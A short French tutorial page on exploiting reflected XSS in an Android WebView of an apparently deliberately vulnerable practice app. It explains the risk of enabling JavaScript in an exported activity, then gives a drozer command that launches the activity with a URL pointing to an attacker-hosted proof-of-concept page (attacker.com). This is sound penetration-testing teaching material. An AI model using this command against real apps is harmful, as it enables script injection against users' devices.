# RXSS

## Reconnaissance

Le Javascript peut être activé par les developpeurs à l'aide de la commande suivante dans le code source:

```java
webView.getSettings().setJavaScriptEnabled(true);
```

L'ajout de cette configuration crée une interface entre le javascript de la page Web et le code java côté client de l'application. c'est-à-dire que le javascript de la page Web peut accéder et injecter du code javascript dans l'application comme si celui-ci en faisait partie.

si cette activité est exportée, cela peut être dangereux et permet à un attaquant de mener de nombreuses attaques dont des injections XSS.

## Exploitation

### Simple XSS

* Créer un fichier .html contenant un payload de XSS basique
* Héberger le fichier sur un serveur web attaquant
* Utiliser la même commande que pour les vulnérabilités vues précédemment

```
dz> run app.activity.start --component com.tmh.vulnwebview com.tmh.vulnwebview.RegistrationWebView --extra string reg_url "https://attacker.com/poc.html"
```

<figure><img src="https://3571537825-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOIXudYEdnnE8JjXBrL0o%2Fuploads%2FFctU1FI6sPONsFS0N1V8%2Fimage.png?alt=media&#x26;token=bffc1b5b-3734-4804-8c46-20d57dc37472" alt=""><figcaption><p>Résultat de l'execution de la RXSS</p></figcaption></figure>
